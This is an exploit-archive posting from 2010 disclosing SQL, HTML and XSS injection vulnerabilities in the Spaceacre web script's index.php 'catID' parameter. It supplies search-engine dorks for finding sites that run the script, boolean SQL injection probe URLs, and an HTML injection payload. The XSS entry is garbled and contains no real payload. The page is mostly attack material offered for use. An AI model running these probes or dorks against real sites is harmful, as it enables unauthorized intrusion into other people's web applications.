Spaceacre (index.php) SQL/HTML/XSS Injection Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Spaceacre (index.php) SQL/HTML/XSS Injection Vulnerability
# Published : 2010-05-26
# Author : CoBRa_21
# Previous Title : Multi Vendor Mall (itemdetail.php & shop.php) SQL Injection Vulnerability
# Next Title : QuickTalk v1.2 (Source code disclosure) Multiple Vulnerabilities

-------------------------------------------------------------------------------------------

Spaceacre (index.php) SQL/HTML/XSS Injection Vulnerability

-------------------------------------------------------------------------------------------

Author: CoBRa_21

Script Home: http://www.spaceacre.com

Dork 1: inurl:cat1.php?catID= "Spaceacre"

Dork 2: intext:"Designed by Spaceacre"

-------------------------------------------------------------------------------------------

SQL Injection:

http://localhost/[path]/index.php?catID=1 and 1=2
http://localhost/[path]/index.php?catID=1 and 1=1
-------------------------------------------------------------------------------------------

HTML Injection:

http://localhost/[path]/index.php?catID=<font size=15 color=green>CoBRa_21</font> HTML &#304;NJ.

-------------------------------------------------------------------------------------------

XSS Injection:

http://localhost/[path]/index.php?catID=index.php?catID= XSS &#304;NJ.

-------------------------------------------------------------------------------------------